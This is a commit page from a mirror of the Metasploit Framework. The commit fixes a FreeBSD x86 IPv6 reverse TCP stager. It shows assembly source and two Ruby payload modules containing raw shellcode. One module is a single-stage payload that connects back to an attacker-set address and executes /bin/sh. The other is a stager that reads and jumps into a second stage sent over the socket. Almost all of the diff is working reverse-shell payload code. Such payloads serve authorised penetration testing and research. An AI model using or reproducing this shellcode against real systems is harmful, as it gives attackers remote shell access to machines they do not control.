infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix up reverse_tcp ipv6 stager for freebsd

unstable
HD Moore 2012-02-01 01:41:24 -06:00
parent 29d8feaa24
commit 0c2a18d765
3 changed files with 38 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm vendored
View File

@ -76,10 +76,10 @@ ipv6_address:
db 28 ; sa_family_t sin6_family; /* AF_INET6 */ db 28 ; sa_family_t sin6_family; /* AF_INET6 */
dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */ dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */
dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */ dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */
dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */ dd 0 ; struct in6_addr sin6_addr; /* IP6 address */
dd 0x48474645 dd 0
dd 0x4d4b4a49 dd 0
dd 0x51504f4e dd 0x01000000 ; default to ::1
dd 0 ; uint32_t sin6_scope_id; /* scope zone index */ dd 0 ; uint32_t sin6_scope_id; /* scope zone index */
skip_bounce: skip_bounce:
@ -87,9 +87,26 @@ skip_bounce:
%ifndef USE_SINGLE_STAGE %ifndef USE_SINGLE_STAGE
read: read:
push byte 0x10
pop edx
shl edx, 8
sub esp, edx
mov ecx, esp ; Points to 4096 stack buffer
push edx ; Length
push ecx ; Buffer
%ifdef FD_REG_EBX
push ebx ; Socket
%else
push edi ; Socket
%endif
push ecx ; Buffer to Return
mov al, 0x3 mov al, 0x3
mov byte [ecx - 0x3], 0x10 int 0x80 ; read(socket, &buff, 4096)
int 0x80
ret ret ; Return
%endif %endif

9
modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb
View File

@ -35,18 +35,17 @@ module Metasploit3
{ {
'Offsets' => 'Offsets' =>
{ {
'LHOST' => [ 43, 'ADDR6' ], 'LHOST' => [ 42, 'ADDR6' ],
'LPORT' => [ 36, 'n' ], 'LPORT' => [ 36, 'n' ],
'SCOPEID' => [ 59, 'V' ] 'SCOPEID' => [ 58, 'V' ]
}, },
'Payload' => 'Payload' =>
"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\x6a\x02" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x02" +
"\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" + "\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50\x68\x2f\x2f\x73" +
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80" "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"
} }
)) ))
register_options([ register_options([

12
modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb
View File

@ -45,16 +45,18 @@ module Metasploit3
{ {
'Offsets' => 'Offsets' =>
{ {
'LHOST' => [ 43, 'ADDR6' ], 'LHOST' => [ 42, 'ADDR6' ],
'LPORT' => [ 36, 'n' ], 'LPORT' => [ 36, 'n' ],
'SCOPEID' => [ 59, 'V' ] 'SCOPEID' => [ 58, 'V' ]
}, },
'Payload' => 'Payload' =>
"\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" + "\x31\xc0\x50\x40\x50\x6a\x1c\x6a\x61\x58\x50\xcd\x80\xeb\x0e\x59" +
"\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" + "\x6a\x1c\x51\x50\x97\x6a\x62\x58\x50\xcd\x80\xeb\x21\xe8\xed\xff" +
"\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x40\x41\x42\x43\x45\x46" + "\xff\xff\x1c\x1c\xbf\xbf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x47\x48\x49\x4a\x4b\x4d\x4e\x4f\x50\x51\x00\x00\x00\x00\xb0\x03" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x6a\x10" +
"\xc6\x41\xfd\x10\xcd\x80\xc3" "\x5a\xc1\xe2\x08\x29\xd4\x89\xe1\x52\x51\x57\x51\xb0\x03\xcd\x80" +
"\xc3"
} }
)) ))
register_options([ register_options([